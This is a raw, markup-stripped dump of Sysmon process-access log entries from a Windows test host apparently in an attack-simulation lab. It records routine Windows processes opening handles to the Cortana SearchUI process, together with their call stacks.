12:30:01.284{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.268{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.268{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486004C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d 10341000x800000000000000046505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.268{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486004C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e 10341000x800000000000000046504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.253{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b9b44|C:\Windows\System32\TwinUI.dll+ba1f7|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000046503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.253{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b9b44|C:\Windows\System32\TwinUI.dll+ba1f7|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000046502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.253{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.253{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892300C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.253{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892300C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.253{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892300C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.253{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892300C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892300C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892300C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000046491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000046490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000046489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200500C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1088a6|C:\Windows\System32\TwinUI.dll+82197|C:\Windows\System32\TwinUI.dll+be23e|C:\Windows\System32\TwinUI.dll+be209|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 